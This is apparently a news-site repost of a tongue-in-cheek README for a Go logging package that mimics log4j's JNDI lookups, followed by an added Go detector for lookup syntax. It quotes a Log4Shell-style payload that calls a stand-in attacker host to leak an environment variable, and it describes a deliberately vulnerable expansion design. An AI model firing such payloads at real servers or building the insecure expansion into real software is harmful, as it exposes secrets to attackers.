Live24x7.news

Jndi: An irresponsibly bad logging library

by News Editor
December 11, 2021
in Science, Tech

Is CVE-2021-44228 making you feel left out as a Go programmer?

Fear not. We can fix that.

I wouldn’t use this package, but if you want to…

package main

import (
	"net/http"

	"github.com/bradfitz/jndi"
)

var logger = jndi.NewLogger()

func main() {
	//...
}

// handleSomeTraffic logs the request path, which the client fully controls.
func handleSomeTraffic(r *http.Request) {
	logger.Printf("got request from %s", r.URL.Path)
}

Congrats, the user actually wrote ${jndi:ldap://attacker.example/${env:${lower:u}ser}} and
the logger expanded your environment variable and sent it over the network
as a side-effect of logging.
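
For the defender's side of the nested lookup shown above, here is an added example (not part of the jndi package or of log4j) that screens untrusted input before it reaches an expanding logger. It collapses only the side-effect-free `lower` and `upper` lookups, then reports any lookup kinds that remain; the names `Normalize` and `Findings` are hypothetical, and the sample path is constructed from the string quoted in the text.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// innermost: a ${lower:...} or ${upper:...} lookup with no nested "${" inside it.
var innermost = regexp.MustCompile(`\$\{(lower|upper):([^${}]*)\}`)

// lookup: the prefix of any lookup still present, e.g. "${jndi:" or "${env:".
var lookup = regexp.MustCompile(`\$\{([A-Za-z]+):`)

// Normalize collapses only the case lookups, innermost first.
// It never reads the environment and never opens a network connection.
func Normalize(s string) string {
	for i := 0; i < 32 && innermost.MatchString(s); i++ { // bounded on hostile input
		s = innermost.ReplaceAllStringFunc(s, func(m string) string {
			p := innermost.FindStringSubmatch(m)
			if p[1] == "lower" {
				return strings.ToLower(p[2])
			}
			return strings.ToUpper(p[2])
		})
	}
	return s
}

// Findings returns the de-duplicated lookup kinds left after normalization,
// in order of first appearance. An empty result means no lookup syntax was seen.
func Findings(s string) []string {
	seen := map[string]bool{}
	var kinds []string
	for _, m := range lookup.FindAllStringSubmatch(Normalize(s), -1) {
		if k := strings.ToLower(m[1]); !seen[k] {
			seen[k] = true
			kinds = append(kinds, k)
		}
	}
	return kinds
}

func main() {
	// Constructed sample: the request path quoted in the text above.
	path := "/${jndi:ldap://attacker.example/${env:${lower:u}ser}}"
	fmt.Printf("normalized=%q findings=%v\n", Normalize(path), Findings(path))
}
```

A non-empty result from `Findings` on request data is a signal to alert on or to drop the value; lookups other than `lower` and `upper` are reported but deliberately never resolved.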

Inspiration

I saw https://twitter.com/_StaticFlow_/status/1469358229767475205 and thought it’d
be fun to write an expander while I was bored, stuck in transit.

Bugs

This package is incomplete. log4j actually does a bunch more:

  • https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution
  • https://logging.apache.org/log4j/2.x/manual/lookups.html

Patches welcome to help flesh this package out. We’ve got some
catching up to do.

Apologies

In case you’re seeing this on GitHub and not via Twitter, I acknowledged
that this is questionable taste: https://twitter.com/bradfitz/status/1469523985998118925

In general I believe in the whole #hugops thing. I had a CVE filed against
my own code just the day before: https://twitter.com/bradfitz/status/1469015417679081472

It happens. I joke to cope.
